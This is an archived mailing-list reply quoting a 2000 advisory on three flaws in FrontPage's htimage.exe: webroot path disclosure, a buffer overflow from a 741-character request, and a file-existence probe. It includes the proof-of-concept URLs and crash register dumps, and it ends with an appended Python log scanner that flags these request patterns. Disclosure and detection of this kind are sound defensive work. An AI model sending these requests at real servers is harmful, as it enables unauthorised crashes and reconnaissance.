Hello,
I confirmed the 742-A's caused a page fault in KERNEL32.DLL
at 0167:bff87ede under FP 3.0.2.1105, installed with PWS
under Windows 98 (PWS.EXE Version 4.02.0690). However,
this length did not force A's into the EIP. Instead the stack pointer
is corrupted, now pointing to invalid memory (which caused the page
fault). The relationship of the corrupted stack pointer to the input
overflow data is unclear (it's not 0x41414141) so I'll have to do
some more reverse engineering; I did try longer strings with the
same result.
As well, the file existence test listed under Problem #3 works for
files outside of the webroot but on the same volume. For example,
if your webroot is at d:\Inetpub\wwwroot, the request,
http://server/cgi-bin/htimage.exe/test.doc?0,0
will test for the existence of a file d:\test.doc. Note however, that
htimage.exe checks for the file d:\Inetpub\wwwroot\test.doc first and then
d:\test.doc.
It does not allow me to test for file existence on other volumes.
Cyberiad
----- Original Message -----
From: Narrow <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, April 18, 2000 2:40 PM
Subject: More vulnerabilities in FP
> [ Reader(s), please Cc: your comments/etc to [EMAIL PROTECTED] ]
>
> --------------------------------------------------------------------------------
> -------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
> www.legion2000.cc
>
> ---- INFORMATION ----
> Program Name : CERN Image Map Dispatcher
> Discovered By : Narrow ([EMAIL PROTECTED])
> ---------------------
>
>
> Problem Description
> ~~~~~~~~~~~~~~~~~~~
> CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with
> FrontPage. I found three bugs in "htimage.exe": 1) Gives us the full path
> to the root directory 2) Simple buffer overflow 3) Allows us to access
> files.
>
>
> Problem #1
> ~~~~~~~~~~
> Like I said, the first bug gives us the full path to the root directory.
> I tested this vulnerability against some servers, all were vulnerable!
>
> Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706,
> 4.0.2.2717, 2.0.1.927, 3.0.2.926, 3.0.2.1105, 3.0.2.1330, 3.0.2.1117
> (All Windows based web servers are vulnerable if we have permission
> to execute "htimage.exe" + if "htimage.exe" exists).
>
> To test this vulnerability we need "htimage.exe" in our "cgi-bin"
> directory (it's installed by default) and permission to execute it.
> That's why only Windows is vulnerable, Unix based systems can't execute
> "*.exe" files.
>
> If we access "htimage.exe" using our favorite web browser like:
> http://server/cgi-bin/htimage.exe/linux?0,0
> we get this error:
>
> ------------------------------------------------------------------------------------
> Error
>
> Error calling HTImage:
>
> Picture config file not found, tried the following:
>
> q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
> /linux
> ------------------------------------------------------------------------------------
>
> Now we know that the path to the root directory is
> "q:/hidden_directory_because_of_the_script_kiddies/webroot/".
>
> Problem #2
> ~~~~~~~~~~
> Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0"
> and "FrontPage-PWS32".
> Tested / Vulnerable OS: Windows'95/98
> "htimage.exe" buffer overflows if we access it like:
> http://server/cgi-bin/htimage.exe/<741 A's>?0,0.
>
> ------------------------------------------------------------------------------------
> HTIMAGE caused an invalid page fault in
> module <unknown> at 0000:41414141.
> Registers:
> EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
> EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
> ECX=0054015c DS=013f ESI=005401a0 FS=3467
> EDX=bff76648 ES=013f EDI=00540184 GS=0000
> Bytes at CS:EIP:
>
> Stack dump:
> bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
> 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
> ------------------------------------------------------------------------------------
> <Server still running> + <500 Server Error>
>
> First remote FrontPage exploit?
>
>
> Problem #3
> ~~~~~~~~~~
> It's not a serious bug. Using "htimage.exe" we can access files on the
> server, but we can't read them. Accessing "htimage.exe" like:
> http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
> outputs:
>
> ------------------------------------------------------------------------------------
> Error
>
> Error calling HTImage:
>
> HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
> 'rectangle', 'circle' or 'polygon' (got an alphanumeric string)
> ------------------------------------------------------------------------------------
>
> NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden
>
> Solution
> ~~~~~~~~
> 1) Remove "htimage.exe".
> 2) Do not use FrontPage, simple enough :)
>
> Comments
> ~~~~~~~~
> Sorry for my bad English, not my mother/father language ;)
>
>
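A log-scanning example added here (not part of either message above, nor of any FrontPage tooling) that flags the three request patterns the thread describes against htimage.exe: an oversized PATH_INFO like the 741-byte crash input, a probe for a FrontPage private file such as _vti_pvt/service.pwd, and error responses whose HTImage error page reveals the webroot path. The simplified "client method uri status" log format, the sample lines and the 256-byte length threshold are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (simplified "client method uri status" format,
# not taken from the advisory); the last three mirror the three reported problems.
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET /cgi-bin/htimage.exe/map.conf?12,34 200",
    "10.0.0.5 GET /index.html 200",
    "10.0.0.7 GET /cgi-bin/htimage.exe/linux?0,0 500",
    "10.0.0.9 GET /cgi-bin/htimage.exe/" + "A" * 741 + "?0,0 500",
    "10.0.0.7 GET /cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0 500",
])

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")
HTIMAGE_RE = re.compile(r"/htimage\.exe(?P<path_info>/[^?]*)?", re.IGNORECASE)
MAX_PATH_INFO = 256  # assumption: real image-map config paths are far shorter than 741 bytes
PRIVATE_MARKERS = ("_vti_pvt", "service.pwd")


def classify(uri, status):
    """Return the reasons a request to htimage.exe looks abusive (empty list if
    benign), or None when the request is not for htimage.exe at all."""
    m = HTIMAGE_RE.search(uri)
    if m is None:
        return None
    path_info = unquote(m.group("path_info") or "")
    reasons = []
    if len(path_info) > MAX_PATH_INFO:
        reasons.append("oversized PATH_INFO (%d bytes): overflow attempt" % len(path_info))
    if any(marker in path_info.lower() for marker in PRIVATE_MARKERS):
        reasons.append("PATH_INFO names a FrontPage private file: existence probe")
    if status == "500":
        reasons.append("htimage.exe error page: leaks the webroot path")
    return reasons


def scan(log_text):
    """Parse log lines and return (client, uri_prefix, status, reasons) for flagged requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # skip lines that do not match the assumed format
        client, _method, uri, status = m.groups()
        reasons = classify(uri, status)
        if reasons:
            findings.append((client, uri[:48], status, reasons))
    return findings


if __name__ == "__main__":
    for client, uri, status, reasons in scan(SAMPLE_LOG):
        print(client, status, uri, "; ".join(reasons))
```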